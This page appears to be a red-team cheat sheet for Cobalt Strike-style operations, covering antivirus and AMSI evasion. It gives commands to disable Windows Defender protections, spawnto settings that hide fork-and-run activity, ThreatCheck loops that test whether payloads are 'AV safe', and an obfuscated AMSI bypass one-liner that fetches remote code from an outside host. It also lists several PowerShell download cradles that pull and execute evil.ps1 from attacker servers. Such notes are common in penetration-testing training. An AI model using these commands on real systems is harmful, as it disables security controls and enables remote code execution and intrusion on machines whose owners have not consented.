Skip to main content

AV_Detection

To test AMSI, use the AMSI Test Sample PowerShell cmdlet. "The term 'AMSI' is not recognised" refers that AMSI is not enabled, So either AMSI Bypass is working or Defender is not enabled.

Invoke-Expression 'AMSI Test Sample: 7e72c3ce-861b-4339-8740-0ac1484c1386'

To test on-disk detections, drop the EICAR test file somewhere such as the desktop.

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

Verify if the payload is AV Safe

C:\Tools\ThreatCheck\ThreatCheck\bin\Debug\ThreatCheck.exe -f C:\Payloads\smb_x64.svc.exe -e AMSI
C:\Tools\ThreatCheck\ThreatCheck\bin\Debug\ThreatCheck.exe -f C:\Payloads\http_x64.exe -e AMSI

One Liner to test all payloads for AV safe

Get-ChildItem -Path "C:\Payloads\" -File | ForEach-Object { & echo "Testing file against ThreatCheck (AMSI): $_" ; C:\Tools\ThreatCheck\ThreatCheck\bin\Debug\ThreatCheck.exe -e AMSI -f $_.FullName }

Behaviour Detections (change default process for fork & run)

spawnto x64 %windir%\System32\taskhostw.exe
spawnto x86 %windir%\syswow64\dllhost.exe
spawnto x64 %windir%\System32\dllhost.exe
powerpick Get-Process -Id $pid | select ProcessName

Change the default process for psexec

ak-settings spawnto_x64 C:\Windows\System32\dllhost.exe
ak-settings spawnto_x86 C:\Windows\SysWOW64\dllhost.exe

Disable Defender from local powershell session

Get-MPPreference
Set-MPPreference -DisableRealTimeMonitoring $true
Set-MPPreference -DisableIOAVProtection $true
Set-MPPreference -DisableIntrusionPreventionSystem $true

AMSI BYPASS Use AMSI Bypass with powershell payload if required, Save below one liner to a ps1 file and host it on cobalt strike and use Powershell IEX to fetch and run it in memory to bypass AMSI.

Malleable C2 amsi_disable does not applies to Cobalt Strike Jump Command, So some methods in jump command which uses Powershell like psexec_psh , winrm and winrm64 will not work if payload is detected, So we musty have to use Custom AMSI Bypass script to avoid that and get a shell. To make the jump command work and include amsi bypass into it, We need to modify the Resource kit's template.x86.ps1 (for winrm), template.x64.ps1 (for winrm64) and compress.ps1 (for psexec_psh). To learn more , Read this blog - https://offensivedefence.co.uk/posts/making-amsi-jump/

S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} ) ; Start-Job -ScriptBlock{iex (iwr http://nickelviper.com/a -UseBasicParsing)}

Like below

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://nickelviper.com/amsi-bypass.ps1')) ; IEX ((new-object net.webclient).downloadstring('http://nickelviper.com/a'))"

It can also be combined with Macro

Powershell Execute cradles

iex (New-Object Net.WebClient).DownloadString('https://webserver/payload.ps1')
powershell.exe -nop -w hidden -c "iex (iwr http://nickelviper.com/amsi-bypass.ps1 -UseBasicParsing)"
$ie=New-Object -ComObject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://192.168.230.1/evil.ps1
');sleep 5;$response=$ie.Document.body.innerHTML;$ie.quit();iex $response

PSv3 onwards

iex (iwr 'http://192.168.230.1/evil.ps1')
$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://192.168.230.1/evil.ps1',$false);$h.send();iex $h.responseText
$wr = [System.NET.WebRequest]::Create("http://192.168.230.1/evil.ps1")
$r = $wr.GetResponse()
IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd()